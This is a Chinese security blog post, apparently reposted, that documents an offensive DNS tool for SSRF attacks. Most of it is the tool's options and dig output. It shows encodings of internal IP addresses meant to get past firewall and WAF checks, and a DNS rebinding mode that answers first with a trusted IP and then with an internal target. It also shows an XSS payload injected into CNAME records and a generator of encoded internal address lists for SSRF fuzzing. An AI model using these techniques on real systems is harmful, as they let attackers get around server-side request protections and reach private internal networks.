WEB安全
Dns Auto Rebinding
ssrf时难免会被防火墙拦截恶意返回值,使用过xip.io但效果一般。项目地址: Github
ssrf、ssrf内网地址fuzz、dns二次rebinding、支持ipv4/ipv6、支持ip地址转换码、dns记录污染(文末一个0day为例)。脑图在脑子里,懒得画了。
support Record Type and Encoding:
|
1 2 3 4 5 |
MX = ipv4/ipv6/hex A = ipv4/en/int/hex AAAA = ipv6/int/hex CNAME = ipv4/ipv6/hex |
配置监听服务器example.com:
| record type | record | record value |
|---|---|---|
| A | ns | server ip |
| NS | test | ns.example.com |
sudo pip install ipaddr
修改lib/config.conf: maindomain = test.example.com. 注意根地址.要加
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
Usage: sudo python main.py {Options} Options: -h, --help show this help message and exit -t 300, --TTL=300 ttl value , 0 By Default -y A/AAAA/CNAME/MX, --Type=A/AAAA/CNAME/MX Record Type , A By Default -e int/hex/en, --Encoding=int/hex/en Record Encoding , None By Default -r, --Rebinding The Second Time Query Return Target Ip -p "<script>alert(/xss/)</script>", --payload="<script>alert(/xss/)</script>" Specified Record , Support CNAME/MX |
-y选项指定以什么记录类型返回:
-y A/AAAA/CNAME/MX, --Type=A/AAAA/CNAME/MX Record Type , A By Default
-t选项指定TTL值:
-t 300, --TTL=300 ttl value , 0 By Default
直接A记录返回ipv4地址:
sudo ./main.py
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
➜ ~ dig 192.168.1.1.test.example.com ; <<>> DiG 9.8.3-P1 <<>> 192.168.1.1.test.example.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 50359 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;192.168.1.1.test.example.com. IN A ;; ANSWER SECTION: 192.168.1.1.test.example.com. 0 IN A 192.168.1.1 ;; AUTHORITY SECTION: test.example.com. 227 IN NS ns.example.com. |
server: [21:54:16] client ip:44486 => A => 192.168.1.1.test.example.com.
hex编码:
sudo ./main.py -e hex
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
➜ ~ dig 31302e302e302e31.test.example.com ; <<>> DiG 9.8.3-P1 <<>> 31302e302e302e31.test.example.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1585 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;31302e302e302e31.test.example.com. IN A ;; ANSWER SECTION: 31302e302e302e31.test.example.com. 0 IN A 10.0.0.1 ;; AUTHORITY SECTION: test.example.com. 600 IN NS ns.example.com. |
server: [22:00:42] client ip:30150 => A => 31302e302e302e31.test.example.com.
int编码:
sudo ./main.py -e int
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
➜ ~ dig 3232235777.test.example.com ; <<>> DiG 9.8.3-P1 <<>> 3232235777.test.example.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18066 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;3232235777.test.example.com. IN A ;; ANSWER SECTION: 3232235777.test.example.com. 0 IN A 192.168.1.1 ;; AUTHORITY SECTION: test.example.com. 456 IN NS ns.example.com. |
server: [22:03:00] client ip:5240 => A => 3232235777.test.example.com.
因为waf会识别出内网地址才用的上本项目,那么waf大可识别进制转换这种,所以要自己写个地址转换方法:
num to en:
|
1 2 3 4 5 6 7 |
./lib/common.py 192.168.1.1 1. Single IP Covert For En 2. Build IP List [+] [1 By Default/2] bjckbgikbkb |
sudo ./main.py -e en
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
➜ ~ dig bjckbgikbkb.test.example.com ; <<>> DiG 9.8.3-P1 <<>> bjckbgikbkb.test.example.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5115 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;bjckbgikbkb.test.example.com. IN A ;; ANSWER SECTION: bjckbgikbkb.test.example.com. 0 IN A 192.168.1.1 ;; AUTHORITY SECTION: test.example.com. 20 IN NS ns.example.com. |
server: [22:10:22] client ip:8434 => A => bjckbgikbkb.test.example.com.
dns二次rebinding:
|
1 2 3 |
sudo ./main.py -r Input Safe Ip? [Address/Req By Default]8.8.8.8 |
选择性输入目标信任的地址,比如在ssrf时防火墙在验证dns返回值是否存在于白名单。默认为发起请求的地址。(记得特殊情况需要指定记录类型)
第一次:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
➜ ~ dig 192.168.1.1.test.example.com ; <<>> DiG 9.8.3-P1 <<>> 192.168.1.1.test.example.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59544 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;192.168.1.1.test.example.com. IN A ;; ANSWER SECTION: 192.168.1.1.test.example.com. 0 IN A 8.8.8.8 ;; AUTHORITY SECTION: test.example.com. 461 IN NS ns.example.com. |
第二次:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
➜ ~ dig 192.168.1.1.test.example.com ; <<>> DiG 9.8.3-P1 <<>> 192.168.1.1.test.example.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45312 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;192.168.1.1.test.example.com. IN A ;; ANSWER SECTION: 192.168.1.1.test.example.com. 0 IN A 192.168.1.1 ;; AUTHORITY SECTION: test.example.com. 501 IN NS ns.example.com. |
dns记录污染:
sudo ./main.py -p "<script>alert(/xss/)</script>" -y CNAME
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
➜ ~ dig test.example.com ; <<>> DiG 9.8.3-P1 <<>> test.example.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5073 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;test.example.com. IN A ;; ANSWER SECTION: test.example.com. 0 IN CNAME <script>alert\(/xss/\)</script>test.example.com. |
这个怎么玩取决于你的小脑袋瓜的脑回路了。如果防火墙还要验证是否为信任地址的话修改lib/common.py:
|
1 2 3 |
elif payload != 'None' and payload.find(mainDomain) == -1: record = payload + "信任地址." |
ipListBuild: 批量生成网段地址,选择性编码,适合ssrf内网地址fuzz。
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
python lib/common.py 192.168.1.1 1. Single IP Covert For En 2. Build IP List [+] [1 By Default/2]2 [+] Please Input Segment Length [24 By Default] [+] Please Input Encoding ['ipv4' By Default]hex [+] Please Input Server Root Address [test.example.com By Default] [+] Stored in the 20170625223912_test_example_com_hex.txt [root@VM_34_252_centos dnsAutoRebinding]# head -n 5 20170625223912_test_example_com_hex.txt 3139322e3136382e312e31.test.example.com 3139322e3136382e312e32.test.example.com 3139322e3136382e312e33.test.example.com 3139322e3136382e312e34.test.example.com 3139322e3136382e312e35.test.example.com |
原文地址: http://www.thinkings.org/2017/06/25/dns-auto-rebinding.html 作者:Tr3jer_CongRong
腹黑
文章:26
相关文章
热评文章
最赞的文章
发表评论
您必须[登录] 才能发表留言!